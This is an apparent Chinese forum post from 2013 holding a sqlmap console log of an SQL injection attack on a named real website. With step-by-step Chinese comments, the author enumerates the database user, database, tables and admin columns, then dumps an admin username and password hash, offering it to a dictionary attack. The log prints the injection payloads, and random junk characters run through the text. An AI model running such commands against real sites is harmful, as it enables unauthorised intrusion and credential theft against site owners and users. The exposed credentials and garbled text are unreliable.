D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 E2 U& U" N; w. k3 Q. I
ms "Mysql" --current-user /* 注解:获取当前用户名称
; T1 s/ r1 d7 w; y2 b; b) T+ v sqlmap/0.9 - automatic SQL injection and database takeover tool
3 y2 p6 }2 h3 w+ i' P3 A; ~ http://sqlmap.sourceforge.net starting at: 16:53:54
' p! t# j# \; H9 Y[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# I) }$ }$ ?+ Z. |0 e, Q
session file! o3 z% Q9 N+ `# o( f
[16:53:54] [INFO] resuming injection data from session file1 H- B( Y( b) d6 D% u
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file8 {6 O( @5 ]2 {, O9 w) `* c8 K
[16:53:54] [INFO] testing connection to the target url$ L6 m! O+ _$ W) M7 [) j& {5 k) i
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) r) r5 [7 x! T5 Z% H8 ^" ?sts:, b1 Y5 ?0 t; O5 l( P, Y) P0 O
---
0 k' a- _. Y/ N: l' F- n; \$ o' [Place: GET
# r* r) a2 z6 p+ ~ ^, u1 n5 t X/ ZParameter: id
, n# m$ p+ h0 w* j4 T( c Type: boolean-based blind
( E" `* V& ^) ~- x( T Title: AND boolean-based blind - WHERE or HAVING clause
5 s o- R/ y2 u" l Payload: id=276 AND 799=799
9 H: L5 T3 U7 F Type: error-based. p: n( t R- h$ @) k" G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: B7 g: A: Z; ?0 H1 I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. U& X! Z1 ~ o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 }0 x2 ]9 \7 G- V8 R9 p),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ v& M& [9 H) A Type: UNION query% Y2 ~5 y: E. D3 S/ J6 \: K/ t% T
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 z+ I# C F4 G6 M Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: A5 B1 o, Q6 g) R. N' V; A$ z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ I9 U4 a" p& h; @, I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ J$ O$ ^* e9 K ?0 L
Type: AND/OR time-based blind0 P4 Y# U) v7 j8 F: w% Z
Title: MySQL > 5.0.11 AND time-based blind$ X( ]% r/ F7 f. s
Payload: id=276 AND SLEEP(5)
8 {+ S5 ^3 g6 e: U---, G E6 Y4 D0 w5 e0 {
[16:53:55] [INFO] the back-end DBMS is MySQL
+ r+ u# }) O1 Y! C, L; G- r" u5 Sweb server operating system: Windows
* S: A2 ~1 y; B8 Pweb application technology: Apache 2.2.11, PHP 5.3.0
( h. H+ L) Y/ e3 U6 z6 nback-end DBMS: MySQL 5.0
- ^0 @6 t& x3 q( B& v[16:53:55] [INFO] fetching current user( W+ E5 `/ |0 W! X9 t! f: J& h+ v
current user: 'root@localhost'
; b1 y& ~6 K9 I6 \3 ^[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ Q$ ~5 O+ p( Z7 }9 u" F+ [: N" ?tput\www.wepost.com.hk' shutting down at: 16:53:58; j, I! ?9 n0 w
+ P4 c! A- z2 b! wD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. q& M3 Q' E8 _: O/ \( L
ms "Mysql" --current-db /*当前数据库/ N; [) F7 W: J4 X4 y" j
sqlmap/0.9 - automatic SQL injection and database takeover tool/ }0 i' \5 w1 H/ q7 @: m7 t
http://sqlmap.sourceforge.net starting at: 16:54:16& q8 ~( }8 |( p& f% w7 I
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% y- J6 o% I1 e9 t& @
session file8 @- j; ~/ q1 T X& T
[16:54:16] [INFO] resuming injection data from session file
2 \- x4 p: |! r+ F[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 l T9 b) p& F
[16:54:16] [INFO] testing connection to the target url
9 U5 Y. w* Z" e7 D; f& x' T$ m# Hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
( x' h+ u) q( e( nsts:' M" f! z/ d( }3 m
---
6 J4 W9 R {4 b. m4 ZPlace: GET
$ }; e; p% M' IParameter: id/ q$ l3 C# B4 H) ~ `
Type: boolean-based blind
/ S& d4 D( i/ N Title: AND boolean-based blind - WHERE or HAVING clause# q d9 f9 W' w3 M8 X7 y& u% W$ t
Payload: id=276 AND 799=7993 ?1 F: ?3 ~ d5 i# h* c
Type: error-based% b, v- U/ C: q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( q% [3 R' b, l& h9 E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; o* z6 X& z3 _, q: C
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 u5 l# S" G# m1 t; G
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- Y/ v" H- O9 w9 X6 G
Type: UNION query* C5 \7 r; Y/ C5 m: r
Title: MySQL UNION query (NULL) - 1 to 10 columns
F! e8 ~3 O" ~9 x6 o' w( y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 f7 A3 u: n3 x! Q+ ]0 t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& D# a% o6 U! b! w A. h; D
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) W. f1 X3 ]: S: x; ?- N/ J6 n Type: AND/OR time-based blind. N2 Y2 ]. c; `+ F- i
Title: MySQL > 5.0.11 AND time-based blind/ h3 Z* H; T9 o5 h
Payload: id=276 AND SLEEP(5)
- Y4 ^2 W# @6 ~. }! z---
( H- G. c7 l2 a) Z1 f" X: ^[16:54:17] [INFO] the back-end DBMS is MySQL( O; H6 [2 D+ ~+ T* B
web server operating system: Windows2 H9 H& z3 X( @* r
web application technology: Apache 2.2.11, PHP 5.3.09 x5 h5 V% d1 R" B! z
back-end DBMS: MySQL 5.0
6 j6 ^9 y, c; x0 G5 d; M5 ]8 `4 z$ g[16:54:17] [INFO] fetching current database' N6 c s @& V4 |% X
current database: 'wepost'
0 D2 a5 ?* F; S& P[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ T5 w/ k/ x) D" X( h! btput\www.wepost.com.hk' shutting down at: 16:54:18
6 d1 S' L: a. t" I9 ^D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 D; W# G8 Q! E$ H- L# \
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名' y7 S' O0 A* o& ~" C: P
sqlmap/0.9 - automatic SQL injection and database takeover tool. x+ ^9 g: T. E$ e3 [
http://sqlmap.sourceforge.net starting at: 16:55:25
* M# C5 Q( |8 c2 Z[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! L. [- c, \: q$ b2 G. Y Y0 y& X+ b session file
, J0 z( m7 q4 Y( i. \[16:55:25] [INFO] resuming injection data from session file( O% W% A/ K8 _% D% ?2 A/ X
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: M4 n0 q1 {+ _: v5 u. x
[16:55:25] [INFO] testing connection to the target url {0 X# e* ~$ n4 W1 p/ M: p
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 `8 [; l! f- n" @! {sts:. c/ w0 [+ s- ]4 [
---
1 _# c B) @- O+ Q PPlace: GET3 v" X* Q& U/ i; z7 L
Parameter: id
5 z: j; R% {2 S7 Q# G5 l# D: R. M Type: boolean-based blind& @8 X- w8 M; L B' b
Title: AND boolean-based blind - WHERE or HAVING clause, `5 [5 B+ O6 a+ G: a
Payload: id=276 AND 799=7998 g( y& j% u6 c9 h1 y" e; i5 i
Type: error-based
6 ?( | Z4 H8 O Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" s4 H* ?: u1 R, x
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 M! d, |& }5 ^; S2 ~7 _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. _$ T+ l4 w) _$ n& z/ |& H- o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& Y& `, f8 ]3 T, P0 I( V7 c: C
Type: UNION query
& b. H! @' ~7 p Title: MySQL UNION query (NULL) - 1 to 10 columns
0 m0 s( l: O2 T. { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 [! N G* ~& z, B6 \
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 m x' S$ f7 O+ k, N) S
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. d( F+ U* x2 {2 N: @9 m3 i
Type: AND/OR time-based blind
: z9 y7 L# z' E4 T5 R Title: MySQL > 5.0.11 AND time-based blind
9 P( G6 p9 H8 b M1 G Payload: id=276 AND SLEEP(5)
( B9 C6 x) J8 u9 j---
" J$ ]; c- Y4 T& J9 Z[16:55:26] [INFO] the back-end DBMS is MySQL! R. k" s( g+ P5 P1 c- q
web server operating system: Windows( a4 |3 N" r# O8 s5 f3 v! v
web application technology: Apache 2.2.11, PHP 5.3.0
1 Y3 r2 j3 T; V T) ]back-end DBMS: MySQL 5.0
* W) {3 i' }( V7 U[16:55:26] [INFO] fetching tables for database 'wepost'
* m1 h8 ~( }2 Y2 c) F4 f) l% ]7 ?3 c[16:55:27] [INFO] the SQL query used returns 6 entries* b: t! K$ }9 J$ l3 a4 n# _$ p- G
Database: wepost% S9 R. z1 {0 T% c9 S* s
[6 tables]9 _, D3 f% l9 }$ L0 Y% D# p
+-------------+
. X! t' m. l6 ]( n; f( D5 a: f| admin |
* n% C+ q& F% {| article |
- i8 [3 |, J! L5 P7 L7 _| contributor |" D; v; r; c2 ~7 @: ^. T7 }% ]! b
| idea |
$ k. L) Y& s: K3 x7 f5 M| image |0 k3 `8 f' J" {: O
| issue |7 \8 ^6 H& G0 v( `. Y
+-------------+# w) X6 Q! w' X5 M/ a
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou U# X; [$ ~( e/ g6 ^& u1 L! J$ h( ~
tput\www.wepost.com.hk' shutting down at: 16:55:338 R# I' X3 ^4 H0 Z4 G Y7 y
8 ^: D& [/ G# F( \6 n; DD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! c% f3 V. o; D$ d8 N! }. S( d
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名1 H. }7 N& x; ?9 r' C, u% h$ W! v
sqlmap/0.9 - automatic SQL injection and database takeover tool4 B3 J3 C0 P U& h, F
http://sqlmap.sourceforge.net starting at: 16:56:06( ~# \9 t. j, O: z! z; T
sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 {; q: ^6 {% q1 x; ]" C
sts:
4 G( q* ~. ~1 i4 I# S J---/ W+ ?" R# v. Q9 }
Place: GET
( B' b8 t$ s0 Z: w2 z- VParameter: id- w6 m% a" o& X( s9 H- y
Type: boolean-based blind
- E5 c9 k8 J7 j Title: AND boolean-based blind - WHERE or HAVING clause- `% w& q b5 o
Payload: id=276 AND 799=799
4 t! U& G! q3 |' Z; ` Type: error-based# O, \( \2 c5 V& o- N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 d8 y) z( @, s1 C8 E6 J Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) h2 D0 C9 }# w6 @4 L3 p$ C
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% C( ~5 Z: B% a2 M/ F+ C
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ S% h! W' X+ n4 X4 k
Type: UNION query
: s6 G6 S: v( F( |. z Title: MySQL UNION query (NULL) - 1 to 10 columns
; j e8 v l9 e Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( T5 \# d# E* J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 v# w' T, N1 f! n( E
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; C ]* ]- i! e% T Type: AND/OR time-based blind& x7 `6 q* J8 k. G$ j
Title: MySQL > 5.0.11 AND time-based blind
& `% C0 M: Z1 k% h r$ W! y* g Payload: id=276 AND SLEEP(5)
& k+ r+ f! ?7 R4 ], d---8 L6 p( v# l4 j* @
web server operating system: Windows- J9 f: d4 B3 _% t
web application technology: Apache 2.2.11, PHP 5.3.0
" z& R. T/ D1 {6 v$ s1 Cback-end DBMS: MySQL 5.0
1 \0 x7 E- ^0 i( W. Z1 i% A0 L ?[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
( |! y& y% {4 M& J* p8 ~; l5 R5 Gssion': wepost, wepost/ h2 T& I# ~+ L9 W/ }9 k
Database: wepost
: Z" ^. z5 j2 J" C6 k& bTable: admin
% j( d; b2 f( Q+ H {: [! j0 y* ~[4 columns]# U, u0 v* a6 j! f
+----------+-------------+$ V9 y4 ^. @3 b$ c/ h( M
| Column | Type |
/ w. P/ t; s4 }1 a* r+----------+-------------+
5 e4 T* ^+ n: ^ c/ C| id | int(11) |5 v$ m6 [! u$ X5 @! S
| password | varchar(32) |
6 D t' F n2 U% C| type | varchar(10) |4 C) \7 q$ J# T
| userid | varchar(20) |7 S& y/ t6 F$ b
+----------+-------------+
: g) h3 D4 e3 j* ?4 Q7 z! s shutting down at: 16:56:19- V" J$ ~9 e1 e6 I5 D
! @, Z8 \. E6 wD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& p8 K7 J3 N& h5 D) @% u0 n0 Cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容0 g; u5 ^- u8 P/ U
sqlmap/0.9 - automatic SQL injection and database takeover tool; l2 g5 p; u& l: }6 i: P: V- L e
http://sqlmap.sourceforge.net starting at: 16:57:14
8 `; F e7 V% Rsqlmap identified the following injection points with a total of 0 HTTP(s) reque9 @! R% X ^/ t$ ~- d4 O
sts:
0 v- I! X5 M2 s- ?---
5 z$ U; y" ], Q1 TPlace: GET
5 L i$ o0 W$ g0 w+ HParameter: id7 t$ G4 a" `/ U& C
Type: boolean-based blind
9 I P- D1 n; X3 y3 | Title: AND boolean-based blind - WHERE or HAVING clause
. p1 e+ J+ m* @* R, ` Payload: id=276 AND 799=799
( i& z9 U5 x* c# H( ~* J1 x+ o Type: error-based& q. U+ ^7 n8 T- {6 ~9 d
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: Z3 K- g2 k. @" c4 ?
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) r d7 X7 y7 H0 M
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 F2 Y5 w0 N/ J),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
' ~* z% e9 X: ^# X/ m5 F( x5 C7 n Type: UNION query1 A) {6 o3 l% x. }+ H$ V
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 N. T/ K- | i Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 k! g9 g/ V6 p6 [' o$ L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; R: `- V5 `8 Y" ^- ]5 o( K! n; O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' M2 P2 M( b* g0 c Type: AND/OR time-based blind9 T/ u' o' e" o- a' P3 i
Title: MySQL > 5.0.11 AND time-based blind0 h! c. X8 x. ^ I* b
Payload: id=276 AND SLEEP(5)
( o0 z0 ]) E4 B5 N% t---
/ J/ P" ^ C& tweb server operating system: Windows
j% I4 [! f: V! l. X0 j7 zweb application technology: Apache 2.2.11, PHP 5.3.0
4 t I9 p; e3 h( Sback-end DBMS: MySQL 5.07 L& R+ K. M5 ^9 P. F" ?) i! }6 S
recognized possible password hash values. do you want to use dictionary attack o
: L# K, |- z$ U' Z2 cn retrieved table items? [Y/n/q] y
0 c0 i1 _9 i* N& x1 w, vwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
$ \6 |# w2 B& ?6 {! N- Rdo you want to use common password suffixes? (slow!) [y/N] y
6 g, H' {$ F0 _$ k2 YDatabase: wepost
7 l; @) M, l' p2 ]9 M1 {Table: admin" a, e+ I' c7 ?* P' n5 k
[1 entry]3 {* x8 ^! f4 o7 g0 i2 [9 K
+----------------------------------+------------+
4 s. {' N1 J2 m0 }| password | userid |. ~& f( `, l; e: S1 z. n
+----------------------------------+------------+% B ~! y% y; c/ _
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
6 q: P$ c& B' K( n. U N8 C( J+ V/ p; f+----------------------------------+------------+2 E/ p+ T6 t" l4 \8 X0 _* z% u
shutting down at: 16:58:14
% C' j: M$ Q/ B0 e; @
" B0 t6 M* X/ BD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对